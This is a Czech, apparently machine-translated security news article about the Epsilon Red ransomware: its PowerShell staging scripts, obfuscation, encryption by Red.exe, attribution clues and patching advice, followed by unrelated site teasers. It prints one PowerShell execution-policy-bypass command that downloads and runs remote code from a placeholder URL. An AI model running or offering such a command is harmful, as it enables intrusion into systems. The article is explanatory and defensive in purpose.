Už jste opravili své servery ?
Nová hrozba ransomwaru nazvaná Epsilon Red se zaměřuje na neopravené servery založené na Microsoftu v podnikových datových centrech. Epsilon Red, pojmenovaná po málo známém záporákovi z komiksů Marvel, byla nedávno objevena společností Sophos zabývající se kybernetickou bezpečností. Od svého objevení ransomware napadl mnoho organizací po celém světě.
Bezsouborový ransomware se „skrývá“ v PowerShellu
Bezsouborový ransomware je forma malwaru, který se spouští spojením legitimního softwaru. Bezsouborový malware založený na PowerShellu využívá schopnost PowerShellu načítat se přímo do paměti zařízení. Tato funkce pomáhá chránit malware ve skriptech PowerShellu před detekcí.
V typickém scénáři, když se skript spustí, musí být nejprve zapsán na jednotku zařízení. To umožňuje řešením zabezpečení koncových bodů detekovat skripty. Protože PowerShell je vyloučen ze standardních procesů spouštění skriptů, může obejít zabezpečení koncového bodu. Použití parametru bypass ve skriptu PowerShell navíc umožňuje útočníkovi obejít omezení síťového skriptu.
Příklad parametru bypassu PowerShellu je:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))Jak vidíte, navrhování parametrů bypassu PowerShellu je poměrně snadné.
V reakci na to společnost Microsoft vydala opravu, která řeší zranitelnost vzdáleného spuštění malwaru související s PowerShell. Náplasti jsou však jen tak účinné, jak se používají. Mnoho organizací uvolnilo standardy záplatování, díky čemuž jsou jejich prostředí zranitelná vůči útokům. Návrh Epsilon Red má využít této úrovně zranitelnosti.
Dvojí užitečnost Epsilon Red
Protože Epsilon Red je nejúčinnější proti neopraveným serverům společnosti Microsoft, lze malware použít jako ransomware a identifikační nástroj. Bez ohledu na to, zda je Epsilon v prostředí úspěšný, či nikoli, poskytuje útočníkům lepší přehled o bezpečnostních schopnostech jejich cíle.
Pokud je Epsilon úspěšný v přístupu k Microsoft Exchange Server, znamená to, že organizace nedodržuje běžné osvědčené postupy zabezpečení oprav. Pro útočníka to ukazuje, jak snadno může být Epsilon ohrožen zbytek cílového prostředí.
Epsilon Red používá Obfuscation ke skrytí svého užitečného zatížení. Zmatek činí kód nečitelným a používá se v malwaru PowerShell, aby se zabránilo vysoké čitelnosti skriptů PowerShellu. Při zmatku se používají rutiny alias PowerShell, které antivirovému softwaru znesnadňují identifikaci škodlivých skriptů v protokolech PowerShellu.
Epsilon Red je nejúčinnější proti neopraveným serverům Microsoft
Zatemněné skripty PowerShellu však lze stále identifikovat. Běžným znakem blížícího se útoku PowerShell Script je vytvoření objektu WebClient. Útočník vytvoří objekt WebClient v kódu PowerShellu, aby navázal externí připojení ke vzdálené adrese URL obsahující škodlivý kód.
Pokud je organizace napadena, je velmi nízká pravděpodobnost, že má zavedena dostatečná bezpečnostní opatření k detekci zmatených skriptů PowerShellu. A naopak, pokud se Epsilon Red nepodaří proniknout na server, bude to útočníkovi indikovat, že cílová síť dokáže malware PowerShell rychle dešifrovat, takže útok bude méně hodnotný.
Kybernetické narušení Epsilon Red
Funkce Epsilon Red je velmi jednoduchá. Software používá k infiltraci serverů řadu Powershell skriptů. Tyto skripty PowerShellu jsou očíslovány od 1.ps1 do 12.ps1. Návrh každého skriptu PowerShell má připravit cílový server pro konečné zatížení.
Všechny skripty PowerShellu v Epsilon Red mají svůj vlastní účel. Jeden ze skriptů PowerShell v Epsilon Red je navržen tak, aby řešil pravidla síťové brány firewall cíle. Další software z této řady určený k odinstalaci antivirového softwaru cíle .
Jak asi tušíte, tyto skripty pracují synchronizovaně, aby zajistily, že jakmile je náklad doručen, cíl nemůže rychle zastavit svůj postup.
Přenést užitečné zatížení
Jakmile skripty Epsilon PowerShell uvolní místo pro své konečné užitečné zatížení, je distribuován jako rozšíření Red.exe . Když vstoupí na server, Red.exe prohledá soubory serveru a vytvoří seznam cest k adresářům pro každý soubor, který zjistí. Po vytvoření seznamu se z hlavního souboru malwaru vytvoří podřízené procesy pro každou cestu k adresáři v seznamu. Poté každý podsoubor ransomwaru zašifruje cestu k adresáři ze souboru seznamu.
Po zašifrování všech cest složek v seznamu společnosti Epson bude ponechán soubor .txt, který informuje cíl a uvádí požadavek útočníka. Navíc budou ohroženy všechny přístupné síťové uzly připojené k napadenému serveru a může se zvýšit pravděpodobnost vniknutí malwaru do sítě.
Kdo stojí za Epsilon Red?
Identita útočníků za Epsilon Red je stále neznámá
Identita útočníků za Epsilon Red je stále neznámá. Některé stopy však ukazují na původ útočníků. Prvním vodítkem je název malwaru. Epsilon Red je padouch X-Men s příběhem ruského původu.
Druhé vodítko spočívá ve výkupném souboru .txt, který po sobě kód zanechal. Podobá se poznámce, kterou zanechal ransomwarový gang jménem REvil. Tato podobnost však nenaznačuje, že by útočníci byli členy tohoto gangu. REvil provozuje operaci RaaS (Ransomware jako služba), ve které její pobočky platí společnosti REvil za přístup k jejímu malwaru.
Chraňte se před Epsilon Red
Epsilon Red zatím úspěšně pronikl na neopravené servery. To znamená, že jednou z nejlepších ochran před Epsilon Red a podobným ransomwarovým malwarem je zajistit, aby bylo vaše prostředí správně spravováno. Navíc mít řešení zabezpečení, které dokáže rychle dešifrovat skripty PowerShellu, by bylo užitečným doplňkem vašeho prostředí.
Statická IP adresa je pevná IP adresa nakonfigurovaná v nastavení počítače nebo routeru. Někteří poskytovatelé internetových služeb (ISP) vyžadují zadání statické IP adresy na vašem počítači nebo nastavení TCP/IP routeru, abyste se mohli připojit k internetu.
Podle způsobu infekce patří PublicBoardSearch do kategorie únosců prohlížeče. Jedná se o typ malwaru navržený tak, aby převzal nastavení známého prohlížeče.
Kolekce tapet s vysokým rozlišením pro uživatele počítačů a notebooků s plným rozlišením od Full HD po 4K.
Unixový systém, také známý jako „loopback“, může sám sobě posílat a přijímat síťovou komunikaci přes virtuální síťové zařízení. Počítač může posílat zprávy sám sobě, což umožňuje komunikaci bez aktivní sítě.
Pravděpodobně jste slyšeli rčení, že dostanete to, za co zaplatíte, ale co když dojde na antivirový software? Měli byste si raději koupit softwarové balíčky, než se rozhodnout pro bezplatná řešení ochrany? Možná tomu tak není a zde je důvod!
V dnešním článku Quantrimang shrne oblíbené značky antivirového softwaru na trhu a zjistí, jak se liší mezi Windows PC a macOS.
Není jasné, co Sun Valley přinese kromě změn a vylepšení uživatelského rozhraní nejvyšší úrovně. Zde je tedy to, co uživatelé doufají, že uvidí od velké aktualizace systému Windows 10 Sun Valley, která bude uvedena v příštím roce.
Systém Windows poskytuje možnost Spustit jako správce, která uživatelům umožňuje spouštět aplikace a programy s oprávněními správce. Můžete jej také použít k odstraňování problémů s počítačem. Ale co když tato funkce nefunguje a odebere vám práva správce?
Chyby související s jednotkou vašeho počítače mohou zabránit správnému spuštění systému a omezit přístup k vašim souborům a aplikacím.
Některé varianty malwaru mohou používat různé moduly ke změně toho, jak ovlivňují cílový systém. Co je tedy modulární malware a jak funguje?
